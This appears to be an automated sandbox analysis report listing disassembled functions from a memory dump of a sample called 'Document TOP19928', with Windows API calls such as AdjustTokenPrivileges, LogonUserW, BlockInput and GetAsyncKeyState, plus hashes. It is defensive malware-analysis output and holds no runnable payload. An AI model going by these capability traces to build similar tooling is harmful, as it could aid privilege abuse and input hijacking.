NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0080BC66,?,?,?,?,?), ref: 0085CC7A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: f408be255c433a06ea1e828f6ac00fe5972c882d6ee30771555e92f1b3ae29c6
Instruction ID: 977a76425fd31c8add76452d5d0e3bbd11d412a22b4dacdef12a079ae343ef17
Opcode Fuzzy Hash: f408be255c433a06ea1e828f6ac00fe5972c882d6ee30771555e92f1b3ae29c6
Instruction Fuzzy Hash: 9FF09A3240021CFFEF048F85DC089BE7BB8FB08312F04006AFA01A2161D3716A60EBA0

Function 0083A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0084977D,?,0085FB84,?), ref: 0083A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0084977D,?,0085FB84,?), ref: 0083A314

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ba9fc121d56ede401c3e223c44df4dad041e881cd7944a89e958e379160726f6
Instruction ID: 0d4e00a9585f66bbafc83a613e89393d49143c882de6dd45b9372eb141e82b1f
Opcode Fuzzy Hash: ba9fc121d56ede401c3e223c44df4dad041e881cd7944a89e958e379160726f6
Instruction Fuzzy Hash: A3F05E3554532DABEB20AFA48C49FEA776DFF08761F004166B909D6281D6309940CBE1

Function 0085CD6C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0085CD74
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0080BBE5,?,?,?,?), ref: 0085CDA2

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 7fc6dcd1a70a4f337025ee3fc7e8eeccc3498bd3f974800935a6e192125bea44
Instruction ID: 54c5ea69b6d380b528a9a9d17ad1455cd6d9b0157f3d158d3a17360c9ddf0dad
Opcode Fuzzy Hash: 7fc6dcd1a70a4f337025ee3fc7e8eeccc3498bd3f974800935a6e192125bea44
Instruction Fuzzy Hash: 25E08670100358BFEB155F19DC19FBA3B64FB04752F508225FD56D90E1C7759850DB60

Function 00828713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00828851), ref: 00828728
CloseHandle.KERNEL32(?,?,00828851), ref: 0082873A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 992a12274b587358d378977638bd487d6e396e66d0eb5a23c790ac2efca36cbd
Instruction ID: 326267698b297a3abaa555429029eda9d9c2d08f514b8a2771ee27e81e70d40d
Opcode Fuzzy Hash: 992a12274b587358d378977638bd487d6e396e66d0eb5a23c790ac2efca36cbd
Instruction Fuzzy Hash: A1E0B676011610EEEB252B61EC09D777BA9FB04351B248829B69680571DB66AC90DB10

Function 007FA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,00864178,007F8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 007FA39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007FA3A3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8bd4cdf9054d897334b7bfaf306c50972f5c4a3c44ecf7f30fd75f794c9d02a0
Instruction ID: d5150e27d5ccd370fa8ddbafc234acbbb1d62cca04eb856d9c2c2f097f885d44
Opcode Fuzzy Hash: 8bd4cdf9054d897334b7bfaf306c50972f5c4a3c44ecf7f30fd75f794c9d02a0
Instruction Fuzzy Hash: D1B09231054308ABEA002F91ED09BC93F6AFB44AA3F404020F70D84272CB6654508A91

Function 007FF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4d2c7139ab45998cd357503c9b527787d4fb6c9449f52f0b988989e200feed1
Instruction ID: 8c391e47cfce2fcb2f7d526fc16bdf5da2d3a7218cf9f99af589d50098f5d726
Opcode Fuzzy Hash: f4d2c7139ab45998cd357503c9b527787d4fb6c9449f52f0b988989e200feed1
Instruction Fuzzy Hash: AE321262D69F054DD7239634D832336A249AFB73D8F16E737E819B5AA6EF28C4834140

Function 0080267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0caccf18e9abe59b99afba3dd02ab69150202084fe26d32979a6e0177805a055
Instruction ID: 8f0bb9c65b4f6f2368ae3a64e1953eb2c596f519d677457b40aa9742dc7fbcd5
Opcode Fuzzy Hash: 0caccf18e9abe59b99afba3dd02ab69150202084fe26d32979a6e0177805a055
Instruction Fuzzy Hash: 4DB11220D2AF404DD32396398935332B64CBFBB2D5F52E71BFC1674E62EB6285834541

Function 00838B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00838B25

Part of subcall function 007F543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008391F8,00000000,?,?,?,?,008393A9,00000000,?), ref: 007F5443
Part of subcall function 007F543A: __aulldiv.LIBCMT ref: 007F5463

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 525b9d2aa7f45b03747776e1aeb8cd10effb830d6a46354a2dbd09edcdee2d2c
Instruction ID: dd8438fc1648f7a08c8092d06eb6a89067ae6e1a1ae6a8ac9d613d01b9ce2861
Opcode Fuzzy Hash: 525b9d2aa7f45b03747776e1aeb8cd10effb830d6a46354a2dbd09edcdee2d2c
Instruction Fuzzy Hash: 2021DF72635610CBC729CF29D841A52B3E1FBA4321F288E6DE1E5CB2D0CA74B905CB94

Function 0085DA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0085DB46

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: d88b96b8e7cf35d98a9d2d4c1fdd4432dc91860619a0a9053f20eb643288b1d9
Instruction ID: 1b23d92b9eb4c61c33dc9b49eb53ff0ee7edded6d150d7fb257c04f70acf9fcc
Opcode Fuzzy Hash: d88b96b8e7cf35d98a9d2d4c1fdd4432dc91860619a0a9053f20eb643288b1d9
Instruction Fuzzy Hash: 55110431204325BBEB359E2CCC05FBA3725F741B72F644355FD11DB2D2CA649D189262

Function 0085D6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0080BBA2,?,?,?,?,00000000,?), ref: 0085D740

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 6482c49ae4480dc00400eb5eae4e9e8c69abeaaf27f20b20380d3783dc53362b
Instruction ID: 658309cf89799b40247b1596dd17693c38bbf0edca5c178fcf5e478b75e61ab9
Opcode Fuzzy Hash: 6482c49ae4480dc00400eb5eae4e9e8c69abeaaf27f20b20380d3783dc53362b
Instruction Fuzzy Hash: 42012835600218AFDF249F69D889EF93BA1FF59367F084125FD169B192C330AC25D7A0

Function 0085C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

Part of subcall function 007D2344: GetCursorPos.USER32(?), ref: 007D2357
Part of subcall function 007D2344: ScreenToClient.USER32(008967B0,?), ref: 007D2374
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000001), ref: 007D2399
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000002), ref: 007D23A7

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0080BC4F,?,?,?,?,?,00000001,?), ref: 0085C272

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 7ce0444d3b4b080890feddc7dbaebb616a09b3ffac0a5826dc8be42bc651e194
Instruction ID: fc3750c8bdaa1a6821e93491e1715b076d2b4056a1edb8189c51915eaa50501c
Opcode Fuzzy Hash: 7ce0444d3b4b080890feddc7dbaebb616a09b3ffac0a5826dc8be42bc651e194
Instruction Fuzzy Hash: 03F08234204228EFDF05AF49CC09EBA3BA1FB14752F004025F9569B292CB75A865DFE0

Function 007D189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,007D1B04,?,?,?,?,?), ref: 007D18E2

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 94fc4c6e796fd25bfb7fa3615fead327f51ac18f2a75dad278dc1797ee108d42
Instruction ID: 88380be0f787cf91dfc79cdcb7841dce87d9cfd33e21365824b1fc36c71f3cb8
Opcode Fuzzy Hash: 94fc4c6e796fd25bfb7fa3615fead327f51ac18f2a75dad278dc1797ee108d42
Instruction Fuzzy Hash: 49F0BE30200214AFCB08EF54D86093637B2FB40360F54862AF9524B3A1EB35D860EB50

Function 008441FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00844218

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 2e1c613653a3520d61ecdf7394725765881c742d6de4aa496ccae418f368e37a
Instruction ID: 918cfd2cd4d2b60b772e79e9b71b9af217c8f3a08fd02260916ab8b0d4c99542
Opcode Fuzzy Hash: 2e1c613653a3520d61ecdf7394725765881c742d6de4aa496ccae418f368e37a
Instruction Fuzzy Hash: 47E012312502189FC710AF59D444A9AB7E8EF94761F008016F94AD7352DAB4A8408BA0

Function 0085CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0085CBEE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: ed233daa5df334d19775477e3b1c7aff64f4930740ac315584bc5e9aaa2ca2b2
Instruction ID: 19897f310949a5da443de23dc7506aba4247dd14b08efb4fffd038af050fa0ad
Opcode Fuzzy Hash: ed233daa5df334d19775477e3b1c7aff64f4930740ac315584bc5e9aaa2ca2b2
Instruction Fuzzy Hash: 0DF06D31240354BFDB21EF58DC05FD63BA5FB09760F184059BA21672E2CB707824DBA1

Function 00834EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00834EEC

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 4a38bf6f81e7e379cf35d6a375d672cd4dd2803eb69bb20fdbd6e655ec6522d3
Instruction ID: 0448b46e01ecbc6dcb1edc58abd6b3972ebdd6cc5b21a3a45deaaa427ddc532d
Opcode Fuzzy Hash: 4a38bf6f81e7e379cf35d6a375d672cd4dd2803eb69bb20fdbd6e655ec6522d3
Instruction Fuzzy Hash: B9D09E9916070979ED584B249C5FF771109F3817A6FD4754AB102C90C2E8D57C9590B1

Function 00828C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008288D1), ref: 00828CB3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: cbe889aeb44c189b56927c65499bc206a88e4c4801c100122fd1d3282595300d
Instruction ID: 3dcfbe4cfcd81edcde4b846a815f2070857828a200d0d62e0f5263e10956677e
Opcode Fuzzy Hash: cbe889aeb44c189b56927c65499bc206a88e4c4801c100122fd1d3282595300d
Instruction Fuzzy Hash: FAD05E32260A0EABEF018EA4DC01EAE3B69EB04B02F408111FE15C50A1C775D835AB60

Function 0085CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0080BC0C,?,?,?,?,?,?), ref: 0085CC24

Part of subcall function 0085B8EF: _memset.LIBCMT ref: 0085B8FE
Part of subcall function 0085B8EF: _memset.LIBCMT ref: 0085B90D
Part of subcall function 0085B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00897F20,00897F64), ref: 0085B93C
Part of subcall function 0085B8EF: CloseHandle.KERNEL32 ref: 0085B94E

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: 7e41cd95c8e677730df578820cc794fa2e9a945c4737c8ffa4d46f63f7945341
Instruction ID: 3446d2007abb04b32a97f878c6864129e799ec47a77cf67a133642ec20f9acd7
Opcode Fuzzy Hash: 7e41cd95c8e677730df578820cc794fa2e9a945c4737c8ffa4d46f63f7945341
Instruction Fuzzy Hash: ECE0B635210208DFCB01AF48DD45E9537A5FB1C396F014065FE159B2B2DB31AD64EF51

Function 007D167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

